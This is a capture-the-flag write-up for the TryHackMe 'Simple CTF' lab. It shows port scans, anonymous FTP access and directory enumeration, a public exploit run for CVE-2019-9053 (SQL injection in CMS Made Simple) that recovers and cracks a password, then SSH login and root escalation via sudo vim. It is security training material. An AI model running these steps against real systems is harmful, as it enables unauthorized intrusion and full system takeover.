#+TITLE: TryHackMe - Simple CTF writeup

https://tryhackme.com/room/easyctf

* Scanning and Enumeration

	#+begin_src shell
		nmap -p- -T4 -vv 10.10.10.10
		nmap - 21,80,2222 -T4 -sC -sV -vv 10.10.10.10

		PORT     STATE SERVICE REASON  VERSION
		21/tcp   open  ftp     syn-ack vsftpd 3.0.3
		| ftp-anon: Anonymous FTP login allowed (FTP code 230)
		|_Can't get directory listing: TIMEOUT
		| ftp-syst:
		|   STAT:
		| FTP server status:
		|      Connected to ::ffff:10.9.2.83
		|      Logged in as ftp
		|      TYPE: ASCII
		|      No session bandwidth limit
		|      Session timeout in seconds is 300
		|      Control connection is plain text
		|      Data connections will be plain text
		|      At session startup, client count was 3
		|      vsFTPd 3.0.3 - secure, fast, stable
		|_End of status
		80/tcp   open  http    syn-ack Apache httpd 2.4.18 ((Ubuntu))
		| http-methods:
		|_  Supported Methods: OPTIONS GET HEAD POST
		| http-robots.txt: 2 disallowed entries
		|_/ /openemr-5_0_1_3
		2222/tcp open  ssh     syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
		| ssh-hostkey:
		|   2048 29:42:69:14:9e:ca:d9:17:98:8c:27:72:3a:cd:a9:23 (RSA)
		| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCj5RwZ5K4QU12jUD81IxGPdEmWFigjRwFNM2pVBCiIPWiMb+R82pdw5dQPFY0JjjicSysFN3pl8ea2L8acocd/7zWke6ce50tpHaDs8OdBYLfpkh+OzAsDwVWSslgKQ7rbi/ck1FF1LIgY7UQdo5FWiTMap7vFnsT/WHL3HcG5Q+el4glnO4xfMMvbRar5WZd4N0ZmcwORyXrEKvulWTOBLcoMGui95Xy7XKCkvpS9RCpJgsuNZ/oau9cdRs0gDoDLTW4S7OI9Nl5obm433k+7YwFeoLnuZnCzegEhgq/bpMo+fXTb/4ILI5bJHJQItH2Ae26iMhJjlFsMqQw0FzLf
		|   256 9b:d1:65:07:51:08:00:61:98:de:95:ed:3a:e3:81:1c (ECDSA)
		| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBM6Q8K/lDR5QuGRzgfrQSDPYBEBcJ+/2YolisuiGuNIF+1FPOweJy9esTtstZkG3LPhwRDggCp4BP+Gmc92I3eY=
		|   256 12:65:1b:61:cf:4d:e5:75:fe:f4:e8:d4:6e:10:2a:f6 (ED25519)
		|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJ2I73yryK/Q6UFyvBBMUJEfznlIdBXfnrEqQ3lWdymK
		Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
	#+end_src

* Enumerating Services
** FTP

	 Anonymous login is allowed for FTP, let's take a look.

	 #+begin_src shell
		 ftp 10.10.173.240

		 Connected to 10.10.173.240.
		 220 (vsFTPd 3.0.3)
		 Name (10.10.173.240:kali): anonymous
		 230 Login successful.
		 Remote system type is UNIX.
		 Using binary mode to transfer files.

		 ftp> dir
		 200 PORT command successful. Consider using PASV.
		 150 Here comes the directory listing.
		 drwxr-xr-x    2 ftp      ftp          4096 Aug 17  2019 pub
		 226 Directory send OK.

		 ftp> cd pub
		 250 Directory successfully changed.

		 ftp> dir
		 200 PORT command successful. Consider using PASV.
		 150 Here comes the directory listing.
		 -rw-r--r--    1 ftp      ftp           166 Aug 17  2019 ForMitch.txt
		 226 Directory send OK.

		 ftp> get ForMitch.txt
		 local: ForMitch.txt remote: ForMitch.txt
		 200 PORT command successful. Consider using PASV.
		 150 Opening BINARY mode data connection for ForMitch.txt (166 bytes).
		 226 Transfer complete.
		 166 bytes received in 0.00 secs (271.0859 kB/s)

		 ftp> exit
		 221 Goodbye.
	 #+end_src

	 The 'ForMitch.txt' file contains a clue: "Dammit man... you'te the worst dev i've seen. You set the same pass for the system user, and the password is so weak... i cracked it in seconds. Gosh... what a mess!"

** HTTP

	 The website at http://10.10.173.240:80/ is the "Apache2 Ubuntu Default Page". Let's look for any hidden directories:

	 #+begin_src shell
		 dirsearch -u http://10.10.173.240 -w /usr/share/wordlists/dirb/common.txt

		 Target: http://10.10.173.240/

		 [08:07:14] Starting:
		 [08:07:22] 200 -   11KB - /index.html
		 [08:07:26] 200 -  929B  - /robots.txt
		 [08:07:27] 403 -  301B  - /server-status
		 [08:07:27] 301 -  315B  - /simple  ->  http://10.10.173.240/simple/
	 #+end_src

* Vulnerable Web application

	http://10.10.173.240/simple shows a succesful installation of *CMS Made Simple v2.2.8* and let's us known that:
	- the admin page is at http://10.10.173.240/simple/admin/
	- the news module is installed

	Using `searchsploit`, we find the latter has a known vulnerability, *CVE-2019-9053*.

	#+begin_src shell
		searchsploit cms made simple

		-------------------------------------------------------------- ---------------------------------
		Exploit Title                                                |  Path
		-------------------------------------------------------------- ---------------------------------
		CMS Made Simple < 2.2.10 - SQL Injection                      | php/webapps/46635.py
		-------------------------------------------------------------- ---------------------------------
	#+end_src

	#+begin_quote
	An issue was discovered in CMS Made Simple 2.2.8. It is possible with the News module, through a crafted URL, to achieve unauthenticated blind time-based SQL injection via the m1_idlist parameter.
	#+end_quote

	https://nvd.nist.gov/vuln/detail/CVE-2019-9053
	https://www.exploit-db.com/exploits/46635

	Let's run the exploit as follow:

	#+begin_src shell
		searchsploit -m 46635
		python 46635.py -u http://10.10.173.240/simple/ --crack -w /usr/share/wordlists/rockyou.txt

		[+] Salt for password found: 1dac0d92e9fa6bb2
		[+] Username found: mitch
		[+] Email found: admin@admin.com
		[+] Password found: 0c01f4468bd75d7a84c7eb73846e8d96
		[+] Password cracked: secret
	#+end_src

* User flag

	The credentials obtained allows to connect to the machine via SSH.

	#+begin_src shell
		ssh mitch@10.10.173.240 -p 2222
		cat user.txt
	#+end_src

* Privelege Escalation and root flag

	#+begin_src shell
		sudo -l

		User mitch may run the following commands on Machine:
		(root) NOPASSWD: /usr/bin/vim
	#+end_src

	`vim` is executable as root via sudo without need for a password. Run `sudo vim`, following by `:!/bin/bash` to get a root shell: flag is in '/root/root.txt'.

	#+begin_src shell
		sudo vim -c ":!/bin/sh"

		# id
		uid=0(root) gid=0(root) groups=0(root)

		cat /root/root.txt
	#+end_src
